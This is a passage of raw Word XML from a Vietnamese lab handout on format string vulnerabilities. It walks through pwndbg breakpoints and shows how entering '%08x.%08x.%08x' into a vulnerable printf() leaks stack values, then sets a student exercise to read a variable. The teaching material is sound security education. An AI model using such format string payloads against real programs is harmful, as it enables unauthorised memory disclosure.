          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00F352EB" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00F352EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F352EB">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b* 0x804</w:t>
      </w:r>
      <w:r w:rsidR="002515A3">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>84ea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF60497" w14:textId="6479D3F9" w:rsidR="00512AD8" w:rsidRDefault="005D0DD4" w:rsidP="002D57B5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00512AD8" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00512AD8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00512AD8" w:rsidRPr="00512AD8">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>b* 0x80484f9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38304B90" w14:textId="301C4579" w:rsidR="00F352EB" w:rsidRPr="00F352EB" w:rsidRDefault="005D0DD4" w:rsidP="002D57B5">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
        <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidR="00F352EB" w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00F352EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F352EB">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3497E615" w14:textId="0B73EC77" w:rsidR="005806E4" w:rsidRDefault="00EB0375" w:rsidP="00EB0375">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79433F62" wp14:editId="382CB121">
            <wp:extent cx="2938509" cy="70793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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2984182" cy="718943"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E938F0" w14:textId="5DB07CE0" w:rsidR="00D53023" w:rsidRDefault="00F352EB" w:rsidP="005806E4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Chương trình sẽ dừng ở vị trí hàm scanf() để chờ người dùng nhập chuỗi s. N</w:t>
      </w:r>
      <w:r w:rsidR="00D53023">
        <w:t xml:space="preserve">hập chuỗi </w:t>
      </w:r>
      <w:r w:rsidR="00D53023" w:rsidRPr="00D53023">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>%08x.%08x.%08x</w:t>
      </w:r>
      <w:r w:rsidR="006A7C24">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D411D44" w14:textId="7373EA16" w:rsidR="00D53023" w:rsidRDefault="00EB0375" w:rsidP="00D76768">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40E83458" wp14:editId="22763A71">
            <wp:extent cx="4039340" cy="2075137"/>
            <wp:effectExtent l="0" t="0" r="0" b="19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4064103" cy="2087859"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CD657" w14:textId="77777777" w:rsidR="00B8600B" w:rsidRDefault="00C025B2" w:rsidP="00ED4450">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Có thể thấy, đối với dòng gọi printf() thứ nhất, tham số đầu tiên của printf là địa chỉ của chuỗi </w:t>
      </w:r>
      <w:r w:rsidR="00A04DAA" w:rsidRPr="00ED4450">
        <w:t>định dạng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%08x.%08x.%08x.%s\n</w:t>
      </w:r>
      <w:r w:rsidR="00A04DAA" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tham số thứ 2 là </w:t>
      </w:r>
      <w:r w:rsidR="00200737">
        <w:t>giá trị của</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF3747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>, tham số thứ 3</w:t>
      </w:r>
      <w:r w:rsidR="009D3046" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve"> là giá trị của </w:t>
      </w:r>
      <w:r w:rsidR="009D3046" w:rsidRPr="00CF3747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="009D3046" w:rsidRPr="00ED4450">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tham số thứ 4 là </w:t>
      </w:r>
      <w:r w:rsidR="009D3046" w:rsidRPr="00ED4450">
        <w:t>là giá trị của</w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00CF3747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tham số thứ 5 </w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve">là địa chỉ tương ứng </w:t>
      </w:r>
      <w:r w:rsidR="00BC6CB3">
        <w:t xml:space="preserve">của </w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve">chuỗi </w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00ED4450" w:rsidRPr="00ED4450">
        <w:t xml:space="preserve"> đã nhập. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBFD41B" w14:textId="3A4BF099" w:rsidR="007E4C78" w:rsidRDefault="00ED4450" w:rsidP="00ED4450">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED4450">
        <w:t>Tiếp tục chạy chương trình</w:t>
      </w:r>
      <w:r w:rsidR="00B8600B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461721A" w14:textId="244CB71B" w:rsidR="00B8600B" w:rsidRPr="00F352EB" w:rsidRDefault="00B8600B" w:rsidP="00B8600B">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ind w:left="142" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r w:rsidRPr="00747EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93606F" w14:textId="6E115D69" w:rsidR="00ED4450" w:rsidRDefault="00EB0375" w:rsidP="00D76768">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B396940" wp14:editId="52383696">
            <wp:extent cx="3048918" cy="437453"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3158926" cy="453237"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61719605" w14:textId="660B6C06" w:rsidR="001520CB" w:rsidRDefault="00B8600B" w:rsidP="001520CB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta được kết quả in ra màn hình của dòng printf() thứ nhất. </w:t>
      </w:r>
      <w:r w:rsidR="0078512E">
        <w:t>Chương trình dừng ở dòng lệnh gọi</w:t>
      </w:r>
      <w:r w:rsidR="001520CB">
        <w:t xml:space="preserve"> printf() thứ 2. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C111004" w14:textId="0C903B3B" w:rsidR="00183824" w:rsidRDefault="00AC76AE" w:rsidP="00D76768">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="143D0B5F" wp14:editId="2AC9E167">
            <wp:extent cx="4666899" cy="241808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743" cy="2433543"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6165BE" w14:textId="390CECD9" w:rsidR="001520CB" w:rsidRDefault="001520CB" w:rsidP="00ED4450">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tại printf() thứ 2 chỉ có 1 tham số là chuỗi s đã nhập. Tuy nhiên, do ở đây ta cố tình nhập chuỗi s giống chuỗi định dạng, printf() sẽ coi </w:t>
      </w:r>
      <w:r w:rsidR="00FB3A3B">
        <w:t>đó</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là chuỗi định dạng và đi tìm các giá trị cụ thể để in ra tương ứng. Thông thường, chuỗi định dạng sẽ là tham số thứ nhất của printf</w:t>
      </w:r>
      <w:r w:rsidR="0078512E">
        <w:t xml:space="preserve"> (mũi tên đỏ)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, các giá trị cần in </w:t>
      </w:r>
      <w:r w:rsidR="0078512E">
        <w:t>sẽ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ở vị trí tham số thứ 2, thứ 3</w:t>
      </w:r>
      <w:r w:rsidR="0078512E">
        <w:t xml:space="preserve"> (màu xanh).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3152D338" w14:textId="6284B9FE" w:rsidR="00FD69E5" w:rsidRDefault="001520CB" w:rsidP="00ED4450">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quan sát stack bên </w:t>
      </w:r>
      <w:r w:rsidR="00C33CF0">
        <w:t>trên</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, đối với printf() thứ 2, </w:t>
      </w:r>
      <w:r w:rsidR="0028410E">
        <w:t xml:space="preserve">các tham số của nó được lưu từ địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="0028410E" w:rsidRPr="0028410E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00AC76AE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d130</w:t>
      </w:r>
      <w:r w:rsidR="0028410E">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidRPr="0028410E">
        <w:t>ham</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> số </w:t>
      </w:r>
      <w:r w:rsidR="0028410E">
        <w:t>đầu tiên</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là địa chỉ chuỗi </w:t>
      </w:r>
      <w:r w:rsidR="004504C3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="000877DF">
        <w:t xml:space="preserve"> (0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00BD21F9">
        <w:t>d140</w:t>
      </w:r>
      <w:r w:rsidR="000877DF">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, như vậy theo logic, printf() sẽ hiểu các </w:t>
      </w:r>
      <w:r w:rsidR="006430E5">
        <w:t>giá trị</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nằm</w:t>
      </w:r>
      <w:r w:rsidR="00F1285F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sau đó ở</w:t>
      </w:r>
      <w:r w:rsidR="00F1285F">
        <w:t xml:space="preserve"> các địa chỉ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00F63531" w:rsidRPr="00F63531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ffff</w:t>
      </w:r>
      <w:r w:rsidR="00BD21F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d13</w:t>
      </w:r>
      <w:r w:rsidR="00F63531" w:rsidRPr="00F63531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F63531" w:rsidRPr="00F63531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0xffff</w:t>
      </w:r>
      <w:r w:rsidR="00BD21F9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>d13</w:t>
      </w:r>
      <w:r w:rsidR="00F63531" w:rsidRPr="00F63531">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="007D2182">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, 0xffffd13c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lần lượt là các tham số 2, 3</w:t>
      </w:r>
      <w:r w:rsidR="00AA07C4">
        <w:t>, 4</w:t>
      </w:r>
      <w:r w:rsidR="0066205E">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">là những giá trị cần in. Với định dạng </w:t>
      </w:r>
      <w:r w:rsidRPr="006430E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%x</w:t>
      </w:r>
      <w:r w:rsidR="002B14C5" w:rsidRPr="002B14C5">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002B14C5">
        <w:t xml:space="preserve"> chương trình sẽ coi</w:t>
      </w:r>
      <w:r w:rsidR="00E17ACE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC64C6">
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r>
        <w:t>giá</w:t>
      </w:r>
      <w:r w:rsidR="00FB22C3">
        <w:t xml:space="preserve"> trị </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tại </w:t>
      </w:r>
      <w:r w:rsidR="005D4DA7">
        <w:t xml:space="preserve">các địa chỉ này </w:t>
      </w:r>
      <w:r w:rsidR="00B54CC1">
        <w:t xml:space="preserve">như kiểu int và </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00B54CC1">
        <w:t xml:space="preserve"> chúng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ra. Do đó t</w:t>
      </w:r>
      <w:r w:rsidR="000516EE">
        <w:t>iếp tục chạy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ta được kết quả</w:t>
      </w:r>
      <w:r w:rsidR="000F5C82">
        <w:t xml:space="preserve"> là các giá trị tại các ô nhớ nằm ngay phía sau tham số đầu tiên của printf.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4190A" w14:textId="72AFB242" w:rsidR="00514D42" w:rsidRDefault="00F5595A" w:rsidP="000F5C82">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59567A79" wp14:editId="02D97BA9">
            <wp:extent cx="4823853" cy="159935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3642" cy="1609232"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C8E78" w14:textId="317B40A5" w:rsidR="00514D42" w:rsidRDefault="00863733" w:rsidP="00ED4450">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ta cũng có thể </w:t>
      </w:r>
      <w:r w:rsidR="008A0A9F">
        <w:t>đọc</w:t>
      </w:r>
      <w:r w:rsidR="002F68CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00577952">
        <w:t>dữ liệu bằng %p</w:t>
      </w:r>
      <w:r w:rsidR="008A0A9F">
        <w:t>, khi đó 1 số giá trị in ra sẽ không đủ 8 ký tự hexan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F146C39" w14:textId="6DC678F4" w:rsidR="00577952" w:rsidRDefault="001D5E1C" w:rsidP="001520CB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="721B2B8A" wp14:editId="50B6A14A">
            <wp:extent cx="3513396" cy="885987"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3565267" cy="899067"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55710553" w14:textId="6AC64D7C" w:rsidR="00F80BFA" w:rsidRPr="001520CB" w:rsidRDefault="00F80BFA" w:rsidP="001520CB">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00F80BFA">
        <w:t>Ở đây cần lưu ý rằng kết quả không giống nhau mọi lúc, vì dữ liệu trên ngăn xếp sẽ khác nhau do các được cấp phát mỗi lần</w:t>
      </w:r>
      <w:r>
        <w:t>.</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1520CB" w14:paraId="145F9090" w14:textId="77777777" w:rsidTr="001520CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="575BC50E" w14:textId="539D169B" w:rsidR="001520CB" w:rsidRDefault="001520CB" w:rsidP="00CD7906">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Sinh viên khai thác và truyền chuỗi s để đọc </w:t>
            </w:r>
            <w:r w:rsidR="00BD2983">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">giá trị </w:t>
            </w:r>
            <w:r w:rsidR="00A52F9D">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">biến </w:t>
            </w:r>
            <w:r w:rsidR="00A52F9D" w:rsidRPr="00966EFD">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> của </w:t>
            </w:r>
            <w:r w:rsidRPr="001520CB">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>main</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="006A7C24">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> Giải thích ý nghĩa của chuỗi định dạng và lý do có thể in được giá trị cần thiết.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DAFE6E" w14:textId="4CF35CD4" w:rsidR="007C7C23" w:rsidRPr="007C7C23" w:rsidRDefault="00966EFD" w:rsidP="007C7C23">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Bonus</w:t>
            </w:r>
            <w:r w:rsidR="007C7C23" w:rsidRPr="007C7C23">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: chuỗi s không dài hơn </w:t>
            </w:r>
            <w:r w:rsidR="00D92257">
              <w:rPr>
